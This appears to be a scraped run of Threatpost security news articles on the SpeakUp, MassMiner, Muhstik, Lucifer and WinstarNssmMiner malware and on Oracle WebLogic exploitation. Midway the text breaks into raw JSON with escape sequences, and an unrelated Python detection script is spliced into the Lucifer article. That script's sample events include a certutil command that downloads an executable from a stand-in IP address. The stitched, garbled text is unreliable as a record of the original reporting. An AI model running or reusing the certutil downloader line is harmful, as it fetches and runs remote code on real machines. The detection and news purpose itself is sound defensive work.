And, he said that since this software can be deployed on virtual servers, all cloud infrastructure is also prone to be affected.

The trojan itself can affect all Linux distributions and MacOS.

## Infection Routine

The initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.

The routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.

After registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say “no task” – or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.

“The beauty is that the threat actor has a foothold on any infected server,” Vanunu said. “Which means he can adapt new future vulnerabilities, and deploy the new code, which will attempt to exploit further using new techniques.
If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.”

The campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.

“The infected hosts are checking the C2 server for new commands every three minutes,” said Vanunu.

“The threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,” he added.

## Highly Sophisticated Propagation

SpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords, and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.

To spread, SpeakUp’s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; an Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).

Figure: SpeakUp’s daily infection rate (image: https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png)

“A successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,” according to Check Point’s analysis, which added that it also has the capability to infect Macs.

## A Bigger Threat in the Making?

Right now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp’s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.

“At the moment SpeakUp serves XMRig miners to its listening infected servers,” according to the research. According to [XMRHunter](<https://www.xmrhunter.com/>), the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.

“SpeakUp’s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,” according to the analysis. “It is hard to imagine anyone would build such a compound array of payloads just to deploy a few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.”

Figure: SpeakUp has no detections in VirusTotal (image: https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png)

The initial victims have been in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world.
Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: “This campaign, while still relatively new, can evolve into something bigger and potentially more harmful…[and] at the time of writing this article, it has no detections in VirusTotal.”

## Attribution

While the exact identity of the threat actor behind this new attack is still unconfirmed, it’s clear that it’s someone or a group with plenty of malware-authoring chops.

“While currently we’ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,” Vanunu told Threatpost. “Not only was this highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.”

Check Point researchers were able to correlate SpeakUp’s author with a possibly Russian-speaking malware developer under the name of Zettabit.

“Although SpeakUp is implemented differently [than Zettabit’s other code], it has a lot in common with Zettabit’s craftsmanship,” according to the analysis.

In terms of what links Zettabit to this malware, “we’ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,” Vanunu told Threatpost. “He even released a free example of botnet code for anyone to use. And while researching, we’ve identified two unique strings that were mentioned and used by Zettabit himself a couple of times in the past.”

_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers._

**Record:** Threatpost (info), "SpeakUp Linux Backdoor Sets Up for Major Attack", published 2019-02-04T14:00:15, modified 2019-02-04T14:00:15. CVEs: CVE-2010-1871, CVE-2012-0874, CVE-2016-3088, CVE-2017-10271, CVE-2018-20062, CVE-2018-2894. CVSS score 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P. Id THREATPOST:260D48C8E6CF572D5CE165F85C7265E6, https://threatpost.com/speakup-linux-backdoor/141431/

**Next record:** Threatpost, last seen 2019-04-25T05:49:59.

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.

In fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle’s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)).
It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.

“It surprised us how many different exploits and hacking tools it leverages,” said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.

They added that the malware family comprises many different versions, but they all spread first within the local network of their initial host, before attempting to propagate across the wider internet.

As for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.

Once the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.

So far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.

The success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.

“Given [the workforce skills shortage], it’s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,” Mishra said via email.
“With the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.”

Worryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.

MassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.

Incidentally, this is not the only cryptomining malware to make use of the ShadowBrokers’ [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero.
Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.

The multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.

“The enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,” said Mishra.

**Record:** Threatpost (info), "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", published 2018-05-03T20:26:37, modified 2018-05-03T20:26:37. CVEs: CVE-2017-0143, CVE-2017-10271, CVE-2017-5638. CVSS score 10.0, vector AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/. Id THREATPOST:7E66A86C86BE8481D1B905B183CA42C3, https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/

**Next record:** Threatpost, last seen 2020-04-08T11:51:46.

UPDATE

A variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.

The newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.

“From the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,” Cong Zheng and Yanhui Jia, researchers with Palo Alto Networks’ Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). “This makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.”

Oracle WebLogic is a popular server used for building and deploying enterprise applications. The server’s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.

However, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.

They saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command to download a PHP webshell.

Interestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots – but now, the IP address appears to also be used as a payload host server.

The discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits.
The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>).

Unit 42 researchers told Threatpost that they didn’t have further information on the number of servers impacted.

## Oracle WebLogic

The latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.

The flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to a remote code-execution attack.

Oracle for its part is urging users to update as soon as possible. “Due to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,” Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.

Oracle didn’t respond to a request for further comment from Threatpost.

However, servers that haven’t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called “Sodinokibi.” That ransomware first came onto researchers’ radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.

Researchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.

https://twitter.com/bad_packets/status/1122356384849248258

When it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet’s toolkit will increase the number of systems it can infect.

“The Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,” they said. “Under the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.”

_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._

**Record:** Threatpost (info), "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", published 2019-05-01T14:11:11, modified 2019-05-01T14:11:11. CVEs: CVE-2017-10271, CVE-2019-2725, CVE-2020-0688. CVSS score 9.0, vector AV:N/AC:L/Au:S/C:C/I:C/A:C. Id THREATPOST:420EE567E806D93092741D7BB375AC57, https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/

**Next record:** Threatpost, last seen 2020-05-31T21:54:31.

Oracle said that a critical remote code execution flaw in its WebLogic Server is being actively exploited in the wild.

The remote code execution flaw ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) impacts a number of versions of Oracle’s WebLogic Server, used for building and deploying enterprise applications. The vulnerability has a CVSS score of 9.8 out of 10.
Part of its seriousness is because it is remotely exploitable without authentication.

“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,” according to Oracle’s Tuesday [security advisory](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>).

The issue stems from a deserialization vulnerability in the XMLDecoder in Oracle’s WebLogic Server web services. The XMLDecoder class is used to read XML documents created using the XMLEncoder, according to Oracle.

Impacted are Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0.

Researchers with KnownSec 404 said the vulnerability bypasses a fix for an infamous Oracle WebLogic Server deserialization flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), which was disclosed earlier this year and patched on April 26.

“A new oracle webLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild. We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019-2725,” researchers said in an analysis [over the weekend](<https://medium.com/@knownsec404team/knownsec-404-team-alert-again-cve-2019-2725-patch-bypassed-32a6a7b7ca15?postPublishedType=repub>).

However, John Heimann, vice president of security program management, disputed the researchers’ claim that the newly-disclosed flaw is related to CVE-2019-2725, saying the two are unrelated: “Please note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability,” he said in [a Tuesday security alert](<https://blogs.oracle.com/security/security-alert-cve-2019-2729-released>).

Neither Oracle nor KnownSec 404 has responded to requests for comment regarding the two contradicting reports.

Regardless, researchers with KnownSec 404, who are credited (among others) for discovering the flaw, said that they have seen the vulnerability being actively exploited in the wild, and warned users to update.

> [#Oracle](<https://twitter.com/hashtag/Oracle?src=hash&ref_src=twsrc%5Etfw>) [#WebLogic](<https://twitter.com/hashtag/WebLogic?src=hash&ref_src=twsrc%5Etfw>) Deserialization RCE Vulnerability (0day) Alert Again (CVE-2019-2725 patch bypassed‼️) Check out the temporary solution offered by KnownSec 404 Team:<https://t.co/1jOYrnysFy>
> 
> — Seebug (@seebug_team) [June 15, 2019](<https://twitter.com/seebug_team/status/1139924754759131136?ref_src=twsrc%5Etfw>)

Critical flaws in Oracle WebLogic Servers continue to be a thorn in the security community’s side.

Researchers said that attackers have been exploiting the older deserialization flaw, CVE-2019-2725, since April 21 in malicious campaigns revolving around the [“Sodinokibi” ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>), [a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, and [GandCrab ransomware](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>).

The sheer number of vulnerable devices and exploit attempts around this flaw shows how serious it is: A scan in May showed more than 41,000 publicly accessible WebLogic instances in the wild, while Palo Alto Networks said that they detected over 600 exploitation attempts targeting CVE-2019-2725.

**Record:** Threatpost (info), "Oracle Warns of New Actively-Exploited WebLogic Flaw", published 2019-06-19T16:25:30, modified 2019-06-19T16:25:30. CVEs: CVE-2019-2725, CVE-2019-2729, CVE-2020-9586. CVSS score 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P. Id THREATPOST:E415CA5BCD7AC520A44AB5246664528A, https://threatpost.com/oracle-warns-of-new-actively-exploited-weblogic-flaw/145829/

**Next record:** Threatpost, last seen 2020-10-16T22:40:45.

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

The never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an “exhaustive” list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” said researchers with Palo Alto Networks’ Unit 42 team, on [Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>).
\u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), the Laravel framework ([CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collect interface information and send the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. 
If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. 
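The propagation chain described above (fan-out probing of ports 1433 and 135, credential brute-forcing, SMB exploitation and a certutil download stage) leaves three independently detectable traces. The following Python is an added detection example, not code from Unit 42 or from the Vulmap project: it runs simple rules over constructed JSON-lines telemetry. The event schema (`type`, `src`, `dst`, `dport`, `host`, `image`, `cmdline`, `result`), the sample events and the threshold values are all assumptions chosen for illustration; real sensor output will need a mapping step.

```python
import json
from collections import defaultdict
from typing import Dict, List, Set

# Ports the write-up says Lucifer probes on the local network: RPC, SMB, MSSQL.
SCAN_PORTS = {135, 445, 1433}
# Tuning values assumed for this example; set them from your own baseline.
FANOUT_THRESHOLD = 5   # distinct targets on one port from one source
BRUTE_THRESHOLD = 5    # failed logons from one source against one service

# Constructed sample telemetry (not real logs), one JSON object per line.
# JSON needs "\\" for a backslash, hence the raw string.
SAMPLE_EVENTS = r"""
{"type":"net","src":"10.0.0.5","dst":"10.0.0.11","dport":1433}
{"type":"net","src":"10.0.0.5","dst":"10.0.0.12","dport":1433}
{"type":"net","src":"10.0.0.5","dst":"10.0.0.13","dport":1433}
{"type":"net","src":"10.0.0.5","dst":"10.0.0.14","dport":1433}
{"type":"net","src":"10.0.0.5","dst":"10.0.0.15","dport":1433}
{"type":"net","src":"10.0.0.5","dst":"10.0.0.16","dport":1433}
{"type":"net","src":"10.0.0.5","dst":"10.0.0.11","dport":135}
{"type":"net","src":"10.0.0.5","dst":"10.0.0.12","dport":135}
{"type":"net","src":"10.0.0.7","dst":"10.0.0.20","dport":443}
{"type":"auth","src":"10.0.0.5","host":"10.0.0.11","service":"mssql","user":"sa","result":"fail"}
{"type":"auth","src":"10.0.0.5","host":"10.0.0.11","service":"mssql","user":"sa","result":"fail"}
{"type":"auth","src":"10.0.0.5","host":"10.0.0.11","service":"mssql","user":"sa","result":"fail"}
{"type":"auth","src":"10.0.0.5","host":"10.0.0.11","service":"mssql","user":"sa","result":"fail"}
{"type":"auth","src":"10.0.0.5","host":"10.0.0.11","service":"mssql","user":"sa","result":"fail"}
{"type":"auth","src":"10.0.0.5","host":"10.0.0.11","service":"mssql","user":"sa","result":"fail"}
{"type":"proc","host":"10.0.0.11","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://203.0.113.9/x.exe C:\\Windows\\Temp\\x.exe"}
{"type":"proc","host":"10.0.0.20","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -verify C:\\certs\\server.cer"}
"""


def parse_events(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def certutil_download(event: Dict) -> bool:
    """certutil used as a downloader: the binary is normal, the -urlcache/URL usage is not."""
    if event.get("type") != "proc":
        return False
    image = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmd = event.get("cmdline", "").lower()
    return image == "certutil.exe" and ("-urlcache" in cmd or "http://" in cmd or "https://" in cmd)


def analyze(text: str) -> List[Dict]:
    """Return one finding per triggered rule: port fan-out, logon brute force, certutil download."""
    events = parse_events(text)
    findings: List[Dict] = []
    targets: Dict[tuple, Set[str]] = defaultdict(set)   # (src, port) -> distinct destinations
    failures: Dict[tuple, int] = defaultdict(int)       # (src, host, service) -> failed logons
    for ev in events:
        kind = ev.get("type")
        if kind == "net" and ev.get("dport") in SCAN_PORTS:
            targets[(ev["src"], ev["dport"])].add(ev["dst"])
        elif kind == "auth" and ev.get("result") == "fail":
            failures[(ev["src"], ev["host"], ev["service"])] += 1
        elif certutil_download(ev):
            findings.append({"rule": "certutil_download", "entity": ev["host"], "detail": ev["cmdline"]})
    for (src, port), dsts in targets.items():
        if len(dsts) >= FANOUT_THRESHOLD:
            findings.append({"rule": "port_fanout", "entity": src, "detail": f"{len(dsts)} hosts on tcp/{port}"})
    for (src, host, svc), count in failures.items():
        if count >= BRUTE_THRESHOLD:
            findings.append({"rule": "auth_bruteforce", "entity": src,
                             "detail": f"{count} failed {svc} logons against {host}"})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"[{finding['rule']}] {finding['entity']}: {finding['detail']}")
```

The two port-135 probes stay below the fan-out threshold and the `certutil -verify` invocation is not flagged, so on this input only the 1433 sweep, the MSSQL brute force and the certutil download produce findings; the brute-force rule deliberately keys on `(src, host, service)` rather than on the user name, because the write-up describes a fixed default administrator name tried against an embedded password list.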
They say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:50", "description": "Hackers behind cryptominer attacks are growing more aggressive and ruthless. 
Case in point: a cryptominer malware sample dubbed WinstarNssmMiner has been tracked in 500,000 attacks in the past three days, earning the crooks $28,000, according to researchers.\n\nWhat makes the cryptominer so vicious is the fact that, post infection, if a victim\u2019s AV software identifies WinstarNssmMiner and tries to remove it (or a user tries to disable it) the malware crashes the host system. WinstarNssmMiner targets Windows systems and leeches on to a system\u2019s processor power with a trojanized version of the XMRig mining program.\n\n\u201cThis malware is very hard to remove since victims\u2019 computers crash as soon as [it\u2019s] found,\u201d according to 360 Security researchers who published a [report on the malware Wednesday](<https://blog.360totalsecurity.com/en/cryptominer-winstarnssmminer-made-fortune-brutally-hijacking-computer/>). \u201cWe\u2019re quite surprised to see a cryptominer being so brutal to hijack victims\u2019 computers by adopting techniques of stubborn malware,\u201d researchers wrote.\n\nAn analysis of the cryptominer campaign reveals WinstarNssmMiner has already earned cybercriminals 133 Monero, or $28,000 based on current rates. Researchers did not specify how long it took criminals to earn that money.\n\nThose totals are a drop in the bucket for crypto-jacking campaigns. Malicious cryptomining that targets computers, servers or cloud-based systems has seen enormous growth over the last six months, earning crooks millions in cryptocurrency. 
In February, hackers are estimated to have earned $3 million by exploiting a vulnerability ([CVE-2017-1000353](<https://jenkins.io/security/advisory/2017-04-26/>)) on servers running Jenkins software and installing Monero miners, researchers at [Check Point reported](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>).\n\nIt\u2019s unclear what the WinstarNssmMiner infection path is, but once the malware executes on a targeted system it launches a system process called svchost.exe, a process that manages system services. Next, it injects malicious code into svchost.exe.\n\n\u201cThere are actually two svchost.exe processes created. One performs the mining tasks. The other runs in the background for sensing the antivirus protection and avoiding detection,\u201d researchers said.\n\nThe svchost.exe process created for cryptomining has a process attribute of CriticalProcess, which means terminating the process crashes the system. A second svchost.exe process runs in the background and attempts to detect \u201cdecent\u201d antivirus software that developers know can identify the malware. \u201c[The] malware will quit automatically to avoid direct confrontation,\u201d researchers said.\n\nThe miner itself is based on the open source project, XMRig. XMRig is a legitimate cryptocurrency mining program known as a high performance Monero CPU miner. The miner is better known for its trojanized versions that have been adopted for criminal use. 
It has been used [in several recent malicious cryptocurrency campaigns](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) and one in January where it was installed via malware on [15 to 30 million endpoints](<https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-cryptocurrency-mining-operation-using-xmrig/>), according to a report by Palo Alto Networks.\n\nXMRig code was also used in recent attacks, such as the Jenkins miner, and also with malicious campaigns dubbed RubyMiner and WaterMiner, according to [an IBM X-Force Research report](<https://securityintelligence.com/xmrig-father-zeus-of-cryptocurrency-mining-malware/>).\n", "cvss3": {}, "published": "2018-05-16T19:56:09", "type": "threatpost", "title": "New Cryptominer Distributes XMRig in Aggressive Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-05-16T19:56:09", "id": "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "href": "https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:28:33", "description": "Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.\n\nThe Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\nScores of Oracle products, roughly two dozen in total, are affected by the vulnerability. 
